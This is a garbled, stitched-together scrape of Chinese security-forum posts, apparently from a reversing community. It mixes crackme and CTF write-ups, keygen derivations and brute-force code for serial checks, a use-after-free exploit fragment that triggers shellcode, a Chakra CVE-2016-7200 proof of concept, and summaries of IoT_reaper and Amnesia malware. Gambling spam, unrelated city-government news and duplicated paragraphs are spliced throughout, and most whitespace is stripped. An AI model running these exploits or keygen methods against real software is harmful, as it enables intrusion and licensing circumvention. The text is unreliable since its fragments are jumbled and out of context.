heat(0,x*8,y*0x20+buf)#overwritetargetwithfreelist+0x10cmd_item_enter()data=cmd_item_delete(1)cmd_item_leave()#copyshellcodetofreelist+0x10buf=buf+=z*0xA0buf+=sccmd_cheat(0,x*8,y*0x20+buf)cmd_exit()#triggermemcmp(callshellcode)cmd_login(username,password)()returnexploit()flag{Cr4k4ndH4ckF0rFunG00dLuck2o17}澳门信誉赌场 ,两轮断下来:/proc/7706/wchan(后面截图的pid可能不同)/proc/self/status先看wchan构造:sys_epoll_wait下面是实际内容:调用strncasecmp进行比较,修改方法自己想。下面使用VBDecompiler进行反编译,下面是关键代码:DataTable:407BB0Dimvar_C0AsStringDimvar_94AsDoubleDimvar_8CAsDoubleloc_408258:OnErrorResumeNextloc_40826A:=(var_9C).Textloc_408280:var_C0=CStr(Trim(CVar(var_9C)))loc_40828E:(var_C0).Text=%x1loc_4082B3:=(var_9C).Textloc_4082D2:(Len(var_9C)=H10)=var_C6(var_C0).Textloc_4082DA:CallProc_0_2_4081F0(var_C0)loc_4082F4:If(%x2And(var_C6=HFF))Thenloc_408306:=(var_9C).Textloc_408336:global_84=Val(CStr(HLeft(CVar(var_9C),8)))loc_408357:=global_84(var_9C).Textloc_408387:global_92=Val(CStr(HRight(CVar(var_9C),8)))loc_4083BE:If(((global_84CDbl(0))And(global_92CDbl(0)))And(global_84global_92))Thenloc_4083D7:var_94=((global_84+global_92)/CDbl(HF4240))loc_4084CA:var_8C=((*((((((((CDbl(2)*((global_76+global_52)^CDbl(2)))*((global_84-global_52)^CDbl(2)))-((global_92+global_52)^(CDbl(4)+global_68)))-((global_76-global_60)^(CDbl(4)+global_52)))+((CDbl(2)*(global_76^CDbl(2)))*((global_92+global_68)^CDbl(2))))+((CDbl(2)*(global_84^CDbl(2)))*(global_92^CDbl(2))))-(global_84^(CDbl(4)-global_52)))^))/(((((global_76+global_68)+global_84)-global_60)+global_92)+global_52))loc_40857A:var_94=(((global_76*(global_84-global_52))*global_92)/((((((((global_76+global_84)+global_92)-global_60)*((((global_76+global_68)+global_84)-global_92)+global_68))*(((global_76+global_92)-global_84)-global_52))*(((global_52+global_84)+global_92)-global_76))+global_60)^(+global_68)))loc_4085FC:IfCBool(1And(Format(var_94,)=CVar(global_104)))Thenloc_40860D:1(0).Enabled=(Format(var_8C,)=CVar(global_100))loc_408623:1(0).Enabled=Trueloc_408639:var_94(HFF).Visible=var_8Cloc_408641:EndIfloc_408643:EndIfloc_408645:EndIfloc_408649:ExitSubEndSub输入长度16个字符,0-9,a-f,分别为global_84,global_92,之后计算方程组,整理后为((*((((((((2*(1711722997^2))*(x^2))-(y^4))-(1711722997^4))+((2*(1711722997^2))*(y^2)))+((2*(x^2))*(y^2)))-(x^4))^))/(1711722997+x+y))=(((1711722997*x)*y)/((((((1711722997+x+y)*(1711722997+x-y))*(1711722997+y-x))*(x+y-1711722997)))^))=其中global_76=1711722997,OD跟踪发现global_68=global_52=global_60=0,在matlab中计算方程组如下:[x,y]=solve(((*((((((((2*(1711722997^2))*(x^2))-(y^4))-(1711722997^4))+((2*(1711722997^2))*(y^2)))+((2*(x^2))*(y^2)))-(x^4))^))/(1711722997+x+y))=,(((1711722997*x)*y)/((((((1711722997+x+y)*(1711722997+x-y))*(1711722997+y-x))*(x+y-1711722997)))^))=,x,y)x=+=+这里,取实数解且xy,15871670001043855616,转换到16进制sn=5e9a3f183e37f900 我有一段数据我自己计算的和程序计算的不一样我的C版本和JAVA版本计算的也不一样,蒙圈了,谁有现成的代码,帮我算一下可以吗?数据chatimg:44F2D2EA8BBDB04D56236E62B98E6A1BC版本结果代码地址:http:///l1028386804/article/details/50748724879BD001A16D4B20JAVA版结果代码地址:http:///sjiang2142/article/details/8128428publicstaticfinalStringCrc64String(StringparamString){(Crc64Long(paramString),16);}java版是toString后的结果-362868a8b5c9484d正确结果-57c054443d9021e这个是程序中的代码publicclassUtils{privatestaticlong[]CRCTable=newlong[256];privatestaticfinallongINITIALCRC=-1L;privatestaticfinallongPOLY64REV=-7661587058870466123L;publicstaticfinalStringTAG==false;publicstaticfinallongCrc64Long(StringparamString){if((paramString==null)||(()==0)){l2=0L;returnl2;}longl2=-1L;inti;if(!init){i=0;}intj;for(;;){if(i=256){init=true;j=();i=0;l1=l2;for(;;){l2=l1;if(i=j){break;}intk=(i);l1=CRCTable[(((int)l1^k)0xFF)]^l18;i+=1;}}l1=i;j=0;if(j8){breaklabel121;}CRCTable[i]=l1;i+=1;}label121:if(((int)l10x1)!=0){}for(longl1=l11^0xAC4BC9B5;;l1=1){j+=1;break;}}请问为什么会这样呢?实在是想不通~~  “我现在已经习惯了房车旅行生活,所到之处也会比较注意保护当地自然环境。。我们注意到9个IoT漏洞利用已经被整合到当前的样本中,如下所示:DlinkGoaheadJAWSNetgearVacronNVR网件LinksysdlinkAVTECH攻击者不断地在样本中增加了更多的新漏洞,其中一个在漏洞发布后两天就被采用。加密结果与必须为:42D3C3C2F12AE92D66C928222CEB540E9407E5774A92B7922E5DFDF0F3549FC6rc6扩展key也被修改过,如下:*a1=0xB7E15163;v3=a1;v4=a1+43;v5=a2;do{v3[1]=*v3+0x61C88647;++v3;}while(v3!=v4);//下面是标准p,q//constunsignedintp=0xb7e15163;//constunsignedintq=0x9e3779b9//-标准逆向方法如下:1.作者给出了前8个字符为kxuectf{,猜测最后一个字符为}。,所以这不是一个好的用户体验,是吗?那么,我们如何执行大量代码而不会阻塞UI使浏览器无法响应呢?解决方案是异步回调。平时分析会多些,但很少去实现,如果文章中哪里有错误,欢迎指出,以便及时改正。UseAfterFree本贴讲述如何利用UAF漏洞,实现GOT表覆盖,从而实现命令执行,另外漏洞程序由本人通过逆向14年的ctf获得,同时进行了一些功能的精简,从而得到下面的漏洞程序,解决漏洞讲解没有漏洞源码源码的问题。为此,该初始释放木马恶意程序试图模仿合法的AdobeFlash安装程序。,清扫者认为调用堆栈中的引用以及从旧到新的引用是根。原标题:贯彻落实绿色发展理念切实保护绿水青山发挥西江黄金水道优势带动各项事业发展  11月8日,市委书记、我市江河湖库总河长李新元到郁江巡河并调研两岸各项建设。,  贵港市是传统农业大市,拥有我国最大的西部内河港口,但工业经济发展却一度滞后。新发现的对象被添加到GC线程可以获取的全局工作表。,这个浏览器客户端是个单页面javascript应用,下层全用ajax与服务端交互。ida打开,定位到main函数后f5反编译mp_set_str(N,(__int64)6248BC3AB92A33B000FDB88568F19727F92F79EB68FF6AD73203EFD20A3E331BE941C7AA288095F33BC4B255FD983114D480EFFBEE2E313E6218A57F9CCC8189,0x10u);mp_set_str(D,(__int64)2476A7F02588913F228923E1F36F963F29708C07B117396817A6B94C336FC77FF7D381925EB40CFED8FBE894570155E41569B4EC69B26CB0320105A29651CB4B,0x10u);sub_140007AD0(T,0i64);mpz_mod((__int64)T,(__int64)N,(__int64)p);if(!(unsignedint)mpz_cmp_ui((__int64)T,0i64)){mpz_divexact(q,(__int64)N,(__int64)p);if((signedint)mpz_cmp((__int64)p,(__int64)q)=0){mpz_sub_ui(p,(__int64)p,1ui64);mpz_sub_ui(q,(__int64)q,1ui64);mpz_mul((__int64)T,(__int64)p,(__int64)q);mpz_invert(T,(__int64)e,(__int64)T);v10=mpz_cmp((__int64)D,(__int64)T);v11=注册成功!!!if(!v10)gotoLABEL_16;}}通过对比gmp大数库,重命名函数名。攻击服务器:,通过漏洞将bot程序植入扫描服务器收集的设备中下图显示了上述4个IP的流量模式:Iot_reaper中集成的9个IoT漏洞攻击与使用弱密码破解的Mirai不同,IoT_reaper利用多个物联网设备漏洞感染物联网设备。1.处理逻辑name是内置的:readyucode是输入的int__cdeclsub_40AEF0(HWNDhDlg){...GetDlgItemTextA(hDlg,1000,name,64);v1=GetDlgItemTextA(hDlg,1001,code,256);v2=v1;if(v1=0x21){if(code[0]!=0x30){v3=0;if(v1=0){LABEL_9:memset(byte_41BC84,0,sizeof(byte_41BC84));v5=off_418078[check(code,name)];MessageBoxA(hDlg,v5,v5,0);return0;}while(1){v4=code[v3];if(!isxdigit(v4)||islower(v4))break;if(++v3=v2)gotoLABEL_9;}}...}z=10000000000000000000000000000000000000000000000000000000000000000079r=code^5modzr有34字节,前17字节作为x,后17字节作为yepInput=(x,y)根据name计算3个md5值:md0=md5(\x01readyu-pediy)=51C75F1F444BAA97ED18DD6C340835D7md1=md5(\x02\x02readyu-2017)=0E5CF7F068D6EFA16F42F935EC424A75md2=md5(\x03\x03\x03readyu-crackme)=A4CD1D64486ABDE1BE441944460CD41D椭圆曲线:m=131,a=13,b=2,c=1,a2=0,a6=1前面的epInput是这个曲线上的点ep1=(51C99BFA6F18DE467C80C23B98C7994AA,42EA2D112ECEC71FCF7E000D7EFC978BD)ep2=(6C997F3E7F2C66A4A5D2FDA13756A37B1,4A38D11829D32D347BD0C0F584D546E9A)n=200000000000000004D4FDD5703A3F269校验(md2*ep1+epInput)*md0modn==(md2*ep2+epInput)*md1modnsignedint__cdeclcheck(char*code,constchar*a2){...get_mip();v29[0]=0;memset(v29[1],0,0x20u);*(_WORD*)v29[33]=0;v29[35]=0;ptr[0]=0x10;ptr[1]=0;ptr[2]=0;ptr[3]=0;ptr[4]=0;ptr[5]=0;ptr[6]=0;ptr[7]=0;ptr[8]=0;ptr[9]=0;ptr[10]=0;ptr[11]=0;ptr[12]=0;ptr[13]=0;ptr[14]=0;ptr[15]=0;ptr[16]=0;ptr[17]=0;ptr[18]=0;ptr[19]=0;ptr[20]=0;ptr[21]=0;ptr[22]=0;ptr[23]=0;ptr[24]=0;ptr[25]=0;ptr[26]=0;ptr[27]=0;ptr[28]=0;ptr[29]=0;ptr[30]=0;ptr[31]=0;ptr[32]=0;ptr[33]=0x79;mirsys_init();v2=z;a2_1=::a2;v4=::x;y=dword_41BC68;x=dword_41BC64;a6=dword_41BC70;w=dword_41BC74;bytes_to_big(34,ptr,z);cinstr(v4,code);if(mr_compare(v4,v2)=0){power(v4,5,v2,w);memset(v29,0,sizeof(v29));if(big_to_bytes(34,w,v29,1)==34){bytes_to_big(17,v29,x);bytes_to_big(17,v29[17],y);convert(0,a2_1);convert(1,a6);v17=1;if(ecurve2_init(131,13,2,1,a2_1,a6,0,0)){qmemcpy(v46,51C99BFA6F18DE467C80C23B98C7994AA,sizeof(v46));qmemcpy(v47,42EA2D112ECEC71FCF7E000D7EFC978BD,sizeof(v47));qmemcpy(v44,6C997F3E7F2C66A4A5D2FDA13756A37B1,sizeof(v44));qmemcpy(v43,4A38D11829D32D347BD0C0F584D546E9A,sizeof(v43));qmemcpy(v45,200000000000000004D4FDD5703A3F269,sizeof(v45));v30=dword_418118;v31=word_41811C;memset(v32,0,sizeof(v32));v33=0;v34=dword_4180E4;v35=byte_4180E8;memset(v36,0,sizeof(v36));v37=0;v38=0;v40=dword_4180F0;v39=dword_4180EC;memset(v41,0,sizeof(v41));a1=0;memset(v49,0,sizeof(v49));v50=0;v51=0;i=0;v6=a1;a3=(char*)mds;lpMem=(flash)v30;do{strcpy(v6,a2);strcat(v6,-);strcat(v6,(constchar*)lpMem);xmd5(v6,strlen(v6),a3,i+1);v6+=256;++i;lpMem+=4;a3+=16;}while(i3);md0=mirvar(0);md1=mirvar(0);md2=mirvar(0);x1=mirvar(0);a3a=mirvar(0);x2=mirvar(0);lpMema=mirvar(0);v9=mirvar(0);ep1=epoint_init();ep2=epoint_init();p1=epoint_init();p2=epoint_init();epInput=epoint_init();if(epoint2_set(x,y,0,epInput)){cinstr(x1,v46);cinstr(a3a,v47);epoint2_set(x1,a3a,0,ep1);cinstr(x2,v44);cinstr(lpMema,v43);epoint2_set(x2,lpMema,0,ep2);bytes_to_big(16,(_BYTE*)mds,md0);bytes_to_big(16,mds[1],md1);bytes_to_big(16,mds[2],md2);ecurve2_mult(md2,ep1,p1);ecurve2_mult(md2,ep2,p2);ecurve2_add(epInput,p1);ecurve2_add(epInput,p2);ecurve2_mult(md0,p1,p1);ecurve2_mult(md1,p2,p2);epoint2_get(p1,x1,a3a);epoint2_get(p2,x2,lpMema);cinstr(v9,v45);divide(x1,v9,v9);divide(x2,v9,v9);v17=3;if(!mr_compare(x1,x2))v17=0;}else{v17=2;}mirkill(md0);mirkill(md1);mirkill(md2);mirkill(x1);mirkill(x2);mirkill(a3a);mirkill(lpMema);mirkill(v9);epoint_free(ep1);epoint_free(ep2);epoint_free(p1);epoint_free(p2);epoint_free(epInput);}mirexit();result=v17;}else{mirexit();result=1;}}else{mirexit();result=1;}returnresult;}2.计算(md2*ep1+epInput)*md0modn==(md2*ep2+epInput)*md1modn=epInput=(md2*md1*ep2-md2*md0*ep1)*(((md0-md1)^-1)modn)得到(02D23461BA71B50AF182DC76E5A7C726F5,07BE013AF19BD185BCD20BB341EA31298B)voidtest2(){biga2=mirvar(0);biga6=mirvar(1);if(ecurve2_init(131,13,2,1,a2,a6,0,0)){epoint*epInput=epoint_init();bigx=mirvar(0);bigy=mirvar(0);bigmd0=mirvar(0);bigmd1=mirvar(0);bigmd2=mirvar(0);cinstr(md0,51C75F1F444BAA97ED18DD6C340835D7);cinstr(md1,0E5CF7F068D6EFA16F42F935EC424A75);cinstr(md2,A4CD1D64486ABDE1BE441944460CD41D);epoint*p1=epoint_init();bigx1=mirvar(0);bigy1=mirvar(0);cinstr(x1,51C99BFA6F18DE467C80C23B98C7994AA);cinstr(y1,42EA2D112ECEC71FCF7E000D7EFC978BD);epoint2_set(x1,y1,0,p1);epoint*p2=epoint_init();bigx2=mirvar(0);bigy2=mirvar(0);cinstr(x2,6C997F3E7F2C66A4A5D2FDA13756A37B1);cinstr(y2,4A38D11829D32D347BD0C0F584D546E9A);epoint2_set(x2,y2,0,p2);bign=mirvar(0);cinstr(n,200000000000000004D4FDD5703A3F269);ecurve2_mult(md2,p2,p2);ecurve2_mult(md1,p2,p2);ecurve2_mult(md2,p1,p1);ecurve2_mult(md0,p1,p1);ecurve2_sub(p1,p2);bigr=mirvar(0);bigrd=mirvar(0);bignd=mirvar(0);bigz=mirvar(0);subtract(md0,md1,r);xgcd(r,n,rd,nd,z);ecurve2_mult(rd,p2,epInput);epoint2_get(epInput,x,y);charsx[256];charsy[256];cotstr(x,sx);cotstr(y,sy);printf(%s,sx);printf(%s,sy);}}用RDLP计算得到code7A7102F36F3B344D666132A6FF7EF4BA05B99640BB815C9E712A72C64B6ABC582C2 ,下面程序进行穷举:importosdeflength(number):n=numberl=0whilen0:n=n/10l+=1returnldefisok(number):res=0n=numberwhilen0:res=res*10+n%10n=n/10ifres==number:return1return0deftest(a):b2=a*9i=0whilei2:b2*=ab2*=9if(isok(b2)==1):print(%d=%d%(a,b2))breaki+=1return0defskip(a):b=1n=awhilen0:if((n%10)==0):a+=bn=n/10b=b*10returnadefmain():printskip(10089000)i=11111111whilei=99999999:i=skip(i)test(i)i+=1printoverreturn0if__name__==__main__:main()输出结果为:需要反向输入,即sn=97654321代码中有一些Hash值,这种方法在shellcode中比较常见,shellcode中是为了减小空间,这里除了这个原因,我在用IDA查找信息的时候并不能从字符串中直接找到函数名,也许这也是一个原因。启动仪式上,贵港市委书记李新元向“970水蜜桃女主播”赠送荷花展吉祥物“和和”、“田田”,并为其进行代言授牌。idapro打开,来到main函数fgets(sn,260,stru_4090E0);v3=strlen(sn)-1;if(v38||v320){sub_401BE0(aKeyLenErrorD__);return0;}输入长度为8-20个字符if(v30){do{v6=sn[v5];if(v6=0||v69)++v4;++v5;}while(v5v3);if(v4){sub_401BE0(aKeyFormatError);return0;}}字符组成为1-9big_init(b1);v22=0;big_load(b1,sn);nullsub_1();big_mul((int)b1,9);sn做为大数*9,即b1=sn*9while(1){big_init3(b2,sn);LOBYTE(v22)=1;v7=big_mul2((int)b1,(int)b2);v8=big_mul((int)b1,9)+v7;nullsub_1();if(v8||big_len((int)b1)%2!=1)gotoLABEL_16;v9=big_len((int)b1);v10=big_val((int)b1,v91);v11=big_val((int)b2,0);v12=b2;if(v10==v11)break;LABEL_17:LOBYTE(v22)=0;sub_401390(v12);if(v8){sub_401BE0(aWrongKey___);gotoLABEL_19;}}循环计算b1=b1*sn*9,直到b1长度为奇数且b1[len/2]==sn[0],其中b2==snb2_len=big_len((int)b2)-1;v14=1-big_len((int)b2);b1_len=big_len((int)b1);v16=big_compare(b1,(int)b2,b1_len+v14,1,b2_len,0);v17=big_len((int)b2);if(big_compare(b1,(int)b2,0,1,v17-1,1)+v16){v8=0;LABEL_16:v12=b2;gotoLABEL_17;}sub_401BE0(aWellDone);正向和反向比较b1和sn,长度为sn-1,即sn[1]开始的数字,至此可以确定是在求回文数。,澳门信誉赌场,CVE-2016-7200标签(空格分隔):ChakraPOCclassdummy{constructor(){return[1,2,3];}}classMyArrayextendsArray{staticget[](){returndummy;}}vara=newMyArray({},[],"natalie",7,7,7,7,7);functiontest(i){returntrue;}varo=(test);调试boolSparseArraySegmentT::IsMissingItem(constT*value){return*value==SparseArraySegmentT::GetMissingItem();}其中左值为0x0000000200000001,右值为0x8000000280000002value实际指向ArraySegment,其中length=3,size=6,元素为1、2、30x00000170823BC5100000000000000003........0x00000170823BC5180000000600000000........0x00000170823BC5200000000000000000........0x00000170823BC5280000000100000002........0x00000170823BC5300000000380000002.......\n0x00000170823BC5388000000280000002......\n对应于poc中定义的(test);会调用()filter()方法创建一个新数组,其包含通过所提供函数实现的测试的所有元素。Amnesia的作者正打算击败基于Linux的恶意软件分析沙箱,并且由于代码中的硬编码字符串(“fxxkwhitehats”)而给安全研究人员带来麻烦。:0040100Dmovdword_41B034,:00401017callget_:::00401026moveax,dword_:0040102Btesteax,:0040102Djnzshortloc_:0040102FpushoffsetaYouGetIt;"Yougetit!".text:00401034callsub_:00401039addesp,:0040103Cxoreax,:0040103Eretncheck1v0!=0,v1!=0,v0!=v15*(v1-v0)+v1=0x8F503A4213*(v1-v0)+v0=0xEF503A42化简第一个等式得6*v1-5*v0=0x8F503A42,记为(1)check2v0!=0,v1!=0,v0!=v117*(v1-v0)+v1=0xF3A948837*(v1-v0)+v0=0x33A94883化简第一个等式得18*v1-17*v0=0xF3A94883,记为(2)化简(1),(2)得-2*v0=0x45B899BD,显然不成立2get_sn存在溢出,溢出修改返回地址为0x00413131,sn格式为:11112222333311Av0=0x31313131v1=0x32323232v2=0x33333333第一个验证:4*(v0-v1)+v0+v2=:004133E9subeax,0EAF917E2h第二个验证:3*(v0-v1)+v0+v2=:004135F7subeax,0E8F508C8h第三个验证:3*(v0-v1)+v0-v2=:004136D8subeax,0C0A3C68h化简得v0-v1=02040F1Av0+v2=E2E8DB7Av0-v2=05FE0F1Av0=7473754Av1=726F6630v2=6E756630Just0for0fun11A 此PowerShell模块还为WindowsDefender安全中心提供了一个额外的界面来配置其缓解设置。加密结果与必须为:42D3C3C2F12AE92D66C928222CEB540E9407E5774A92B7922E5DFDF0F3549FC6rc6扩展key也被修改过,如下:*a1=0xB7E15163;v3=a1;v4=a1+43;v5=a2;do{v3[1]=*v3+0x61C88647;++v3;}while(v3!=v4);//下面是标准p,q//constunsignedintp=0xb7e15163;//constunsignedintq=0x9e3779b9//-标准逆向方法如下:1.作者给出了前8个字符为kxuectf{,猜测最后一个字符为}。2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。本次活动将持续至9月。当进程试图去访问这样一个页时,CPU生成一个页错误来调用Windows的页错误例程。来源:Forcepoint安全实验室2017年10月25日本文由看雪翻译小组编译 ,当安装CaseCreators更新时,相应的缓解已经配置在你的机器上了。:0040100Dmovdword_41B034,:00401017callget_:::00401026moveax,dword_:0040102Btesteax,:0040102Djnzshortloc_:0040102FpushoffsetaYouGetIt;"Yougetit!".text:00401034callsub_:00401039addesp,:0040103Cxoreax,:0040103Eretncheck1v0!=0,v1!=0,v0!=v15*(v1-v0)+v1=0x8F503A4213*(v1-v0)+v0=0xEF503A42化简第一个等式得6*v1-5*v0=0x8F503A42,记为(1)check2v0!=0,v1!=0,v0!=v117*(v1-v0)+v1=0xF3A948837*(v1-v0)+v0=0x33A94883化简第一个等式得18*v1-17*v0=0xF3A94883,记为(2)化简(1),(2)得-2*v0=0x45B899BD,显然不成立2get_sn存在溢出,溢出修改返回地址为0x00413131,sn格式为:11112222333311Av0=0x31313131v1=0x32323232v2=0x33333333第一个验证:4*(v0-v1)+v0+v2=:004133E9subeax,0EAF917E2h第二个验证:3*(v0-v1)+v0+v2=:004135F7subeax,0E8F508C8h第三个验证:3*(v0-v1)+v0-v2=:004136D8subeax,0C0A3C68h化简得v0-v1=02040F1Av0+v2=E2E8DB7Av0-v2=05FE0F1Av0=7473754Av1=726F6630v2=6E756630Just0for0fun11A?PFN数据库的条目数量为nt!MmPfnSize,这其中有一些额外的条目来处理热插拔内存。2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。1.处理逻辑(大数运算用的gmp)sn长度为70,前6位是e,后面的是p已知n,d,pq,求e,p,qn:6248BC3AB92A33B000FDB88568F19727F92F79EB68FF6AD73203EFD20A3E331BE941C7AA288095F33BC4B255FD983114D480EFFBEE2E313E6218A57F9CCC8189d:2476A7F02588913F228923E1F36F963F29708C07B117396817A6B94C336FC77FF7D381925EB40CFED8FBE894570155E41569B4EC69B26CB0320105A29651CB4B2.求解因为e0x1000000,所以可以穷举e,得到e:F552B3有了e,因为e过小,可以直接得到p和q这里借用stackoverflow上的内容3.脚本importitertoolsfromgmpy2import*#e=0xF552B3n=0x6248BC3AB92A33B000FDB88568F19727F92F79EB68FF6AD73203EFD20A3E331BE941C7AA288095F33BC4B255FD983114D480EFFBEE2E313E6218A57F9CCC8189d=0x2476A7F02588913F228923E1F36F963F29708C07B117396817A6B94C336FC77FF7D381925EB40CFED8FBE894570155E41569B4EC69B26CB0320105A29651CB4Bdefget_e(n,d):(0xFFFFFF,-1):ifi=2:return0e=iifnotis_prime(e,500):continuem=0x12345678c=powmod(m,d,n)m2=powmod(c,e,n)ifm==m2:returnereturn0defget_p_q(e,n,d):ed=mul(e,d)k1=div(ed,n)kk=[k1-1,k1,k1+1]foriinrange(len(kk)):k=kk[i](t,rem)=t_divmod(ed-1,k)if(rem!=0):continues=n+(1)-(t)r=isqrt(mul(s,s)-mul(4,n))p=div(s+r,2)q=div(s-r,2)if(pq):p=qprint(sn:%X%X%(e,p))returne=get_e(n,d)print(e:%X%e)get_p_q(e,n,d)使用ida加载so库,arm指令被加花指令,不过还是可以找到规律。?池头用POOL_HEADER结构表示,该结构包含了关于后面跟随的数据区的信息。但是,基于虚拟机的沙箱通常会启用系统快照,从而可以快速恢复到原始状态(尽管样本的分析任务可能会被破坏)在这些情况下,影响将受到限制。关闭优化选项,dep,aslr,safeseh(vs项目属性选择配置属性-链接器-命令行填写“/SAFESEH:NO”)我们可以试试如果和上次一样覆盖掉返回地址当执行到Security_Check_Cookie的时候,他会检查栈Cookies和.data的副本,这时候GS就分发系统异常处理请求然后就由系统接管处理你这个异常我们可以先用mona插件查看程序当前seh链表这个地址指向的就是PointertonextSEHrecord下面的SEhander是ntdll中的系统接管处理。原标题:贯彻落实绿色发展理念切实保护绿水青山发挥西江黄金水道优势带动各项事业发展  11月8日,市委书记、我市江河湖库总河长李新元到郁江巡河并调研两岸各项建设。 UseAfterFree本贴讲述如何利用UAF漏洞,实现GOT表覆盖,从而实现命令执行,另外漏洞程序由本人通过逆向14年的ctf获得,同时进行了一些功能的精简,从而得到下面的漏洞程序,解决漏洞讲解没有漏洞源码源码的问题。这使得MicrosoftEdge成为最安全的浏览器之一,在NSSLab于2017年8月23日至9月12日期间针对网络钓鱼防护的测试结果中,Edge的表现优于Chrome和Firefox。,VM检查后,Amnesia会在/etc//.rebootime和/etc//.reboottime或/.bashrc和/.bash_history中创建持久性文件,具体取决于当前用户的权限。原标题:贯彻落实绿色发展理念切实保护绿水青山发挥西江黄金水道优势带动各项事业发展  11月8日,市委书记、我市江河湖库总河长李新元到郁江巡河并调研两岸各项建设。在介绍我市情况时,黄卫平说,贵港拥有丰富的硒资源,是目前富硒土壤含量较高、最连片、最具有开发富硒农产品的优质地区。。

(一)依托示范区建设发展荷产业2014年覃塘区建立了3000亩莲藕产业(核心)示范区,建成了集观光、体验、休闲、娱乐、文化、饮食于一体的农业生态旅游园。  现任广西贵港市委书记,市人大常委会主任、党组书记。,代码中有一些Hash值,这种方法在shellcode中比较常见,shellcode中是为了减小空间,这里除了这个原因,我在用IDA查找信息的时候并不能从字符串中直接找到函数名,也许这也是一个原因。处理逻辑encode1是base64,encode2和encode3比较简单,略过sn=encode3(sn)+encode2(sn)+encode1(sn)publicclassMainextendsac{...protectedvoidonCreate(){();...//这个不懂为什么没生效,生效的是基类那个(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassuvextendscc{...protectedvoidonCreate(BundlesavedInstanceState){(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassua{static{(enjoy);}...publicstaticnativeintcheck(uathis,Stringarg1){}}处理逻辑JNI_OnLoad中有两个校验和反调试的地方,静态分析的时候直接nop掉,安装完后再替换掉就可以正常调试了(有检测dexsignature和TracerPid什么的).text:00001F4CBLcheck_:00001F50BLcheck_threadso中的check函数.text:00001F38MOVSR3,#:00001F3CLDRR5,[R2,R3].text:00001F3ELDRR2,=(off_5E54-0x1F48).text:00001F40MOVSR0,:00001F42MOVSR3,#:00001F44ADDR2,PCoff_::00005E54off_5E54JNINativeMethodbyte_5E60,aLjavaLangStrin,check+1len(sn)=120,原始sn长度范围(x+x+x/3*4=120):11~36从结果来看原始sn长度是36,但是我后面是从11开始穷举的,浪费了大量的时间.mytext:0000313ELDRR1,[R5].mytext:00003140MOVSR3,#:00003144LDRR3,[R1,R3].mytext:00003146MOVSR2,#:00003148MOVSR1,:0000314AMOVSR0,::0000314EMOVSR6,:00003150BLj_j_strlen_:00003154STRR4,[SP,#0x50+var_4C].mytext:00003156MOVSR1,#:00003158CMPR0,#:0000315ABGTloc_:0000315CADDR4,SP,#0x50+:0000315EMOVSR2,#:00003160MOVSR0,:00003162BLj_j_memset_:00003166MOVSR1,:00003168MOVSR2,#:0000316AMOVSR0,:0000316CBLj_j_memcpy_:00003170LDRR2,[R5].mytext:00003172MOVSR3,#:00003176LDRR3,[R2,R3].mytext:00003178MOVSR1,:0000317AMOVSR2,:0000317CMOVSR0,::00003180MOVSR0,:00003182BLj_j_strlen_:00003186MOVSR1,:00003188MOVSR0,:0000318ABLcheck_snBYTEbuf[40];BYTEkey1[8];BYTEkey2[16];CopyMemory(buf,sn,36);FillMemory(buf+36,0x04,0x04);des_enc(buf,sizeof(buf),key1);(这里des_set_key在处理PC2_Table的时候与标准有偏差)CopyMemory(key2[12],buf[32],4);rc6_encrypt(buf,32,key2,sizeof(key2));(这个不常碰到,跟了一遍)memcmp(buf,expected,32)==0rc6与标准的区别:Q:0x9e3779b9L=0x61C88647L处理前和处理后都进行了byteswap32signedint__fastcallcheck_sn(constvoid*a1,size_ta2){...if(a2==36){v6=j_j_malloc(0x28u);v7=v6;if(v6){j_j_memcpy(v6,v3,v4);v7[36]=4;v7[37]=4;v7[38]=4;v7[39]=4;do{v8=g_key1[v2];v9=0;do{v17[8*v2+v9]=(v8(7-v9))1;++v9;}while(v9!=8);++v2;}while(v2!=8);des_set_key((int)v17);v10=0;do{v11=v7[v10];j_j_memcpy(dest,v7[v10],8u);v15=0;v16=0;des_1840((int)dest,(int)v15);v10+=8;j_j_memcpy(v11,v15,8u);}while(v10!=40);update_key2((int)g_key2,(int)v15);rc6_encrypt(v7,0x20u,(int)g_key2,16);v12=0;while((unsigned__int8)v7[v12]==byte_5D3D[v12]){if(++v12==32){result=1;gotoLABEL_14;}}}}result=0;...}3.穷举sn以kxuectf{开头,以}结尾这里直接按sn长度为36位来穷举了voidDes_SetKey(constcharKey[8]){staticboolK[64];staticboolKL[56];staticboolKR[56];ByteToBit(K,Key,64);Transform(K,K,PC1_Table,56);CopyMemory(KL[0],K[0],28);CopyMemory(KL[28],K[0],28);CopyMemory(KR[0],K[28],28);CopyMemory(KR[28],K[28],28);intoffset=0;for(inti=0;ii++){offset+=LOOP_Table[i];boolTmp[256];for(intn=0;nn++){if(PC2_Table[n]=28){Tmp[n]=KR[PC2_Table[n]-1-28+offset];}else{Tmp[n]=KL[PC2_Table[n]-1+offset];}}memcpy(SubKey[i],Tmp,48);}}voidtest_sn36(){constchar*charset=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789{}constchar*charset2=^_`mEJCTNKOGWRSFYVLZQAH[\\]upibejctnkogwrsfyvlzqahmdxKOGWRSFYVLuiconstchar*charset3=NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm76543210}{intsn_len=36;intindices[36];charsn[40]=BYTEkey1[8]={0xFD,0xB4,0x68,0x54,0x08,0xCD,0x56,0x4E};BYTEkey2[16]={0x65,0x48,0x32,0xEF,0xBA,0xCD,0x56,0x4E,0x0F,0x9B,0x1D,0x27,0x00,0x00,0x00,0x00};CopyMemory(sn,kxuectf{,8);strings1=encode3((PBYTE)sn,8);for(intk1=0;k164;k1++){for(intk2=0;k264;k2++){for(intk3=0;k364;k3++){BYTEexpected[32]={0x42,0xD3,0xC3,0xC2,0xF1,0x2A,0xE9,0x2D,0x66,0xC9,0x28,0x22,0x2C,0xEB,0x54,0x0E,0x94,0x07,0xE5,0x77,0x4A,0x92,0xB7,0x92,0x2E,0x5D,0xFD,0xF0,0xF3,0x54,0x9F,